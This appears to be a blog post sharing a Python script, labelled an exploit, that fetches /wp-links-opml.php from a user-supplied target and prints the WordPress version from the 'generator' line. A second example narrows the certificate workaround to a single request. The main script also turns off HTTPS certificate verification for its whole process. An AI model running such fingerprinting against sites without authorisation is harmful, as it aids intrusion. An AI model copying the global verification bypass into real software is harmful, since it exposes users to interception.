Python Script: Retrieve WordPress Admin v2
- by Vince
This has less to do with WordPress and more to do with a Python exploit which failed to work because of a self-signed SSL certificate. To keep the solution simple, I decided to rewrite the existing WordPress script and test out the fix. Essentially, when a server is using a self-signed SSL certificate and you run the exploit, you're going to see the following error:
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)>
If you look at the original version of this script, you'll notice I've added five lines which solve this issue:
#!/usr/bin/python
import urllib2
import os
import ssl

# Turn off HTTPS certificate verification for the whole process (unless
# PYTHONHTTPSVERIFY is set) so a self-signed certificate no longer raises
# CERTIFICATE_VERIFY_FAILED.
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and
        getattr(ssl, '_create_unverified_context', None)):
    ssl._create_default_https_context = ssl._create_unverified_context

print "[*] Target URL format = http://www.mydomain.com"
host = raw_input("[*] Enter target URL: ")
path = '/wp-links-opml.php'
combined = host + path
url = urllib2.urlopen(combined)
print
print ("fetching... ") + combined
html = url.readlines()
# Print every line of the response that mentions the generator string.
for line in html:
    if 'generator' in line:
        print
        print line
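The override above replaces the default HTTPS context for every request the process makes. As an added example (Python 3, not the author's script), the same request can carry its own context so verification is relaxed for that one call only, or the self-signed certificate can be trusted explicitly through `cafile`. The function names and the sample response are constructed for illustration.

```python
import re
import ssl
import sys
import urllib.request


def scoped_context(verify=True, cafile=None):
    """Build an SSLContext for one request; the process-wide default stays intact."""
    if verify:
        # cafile may be the server's own self-signed certificate (PEM), which
        # keeps verification on while trusting that one certificate.
        return ssl.create_default_context(cafile=cafile)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # must be cleared before verify_mode is lowered
    ctx.verify_mode = ssl.CERT_NONE  # equivalent of the page's unverified context
    return ctx


def generator_lines(body):
    """Return the stripped lines of the response that mention 'generator'."""
    return [ln.strip() for ln in body.splitlines() if "generator" in ln]


def fetch(base_url, context, path="/wp-links-opml.php", timeout=10):
    """Fetch base_url + path using the supplied context only."""
    target = base_url.rstrip("/") + path
    with urllib.request.urlopen(target, timeout=timeout, context=context) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample response; the version number is a placeholder.
SAMPLE = """<?xml version="1.0"?>
<!-- generator="WordPress/0.0.0" -->
<opml version="1.0">
</opml>
"""

if __name__ == "__main__":
    # Usage: script.py https://host [path-to-self-signed-cert.pem]
    cafile = sys.argv[2] if len(sys.argv) > 2 else None
    ctx = scoped_context(verify=cafile is not None, cafile=cafile)
    for line in generator_lines(fetch(sys.argv[1], ctx)):
        print(line)
```
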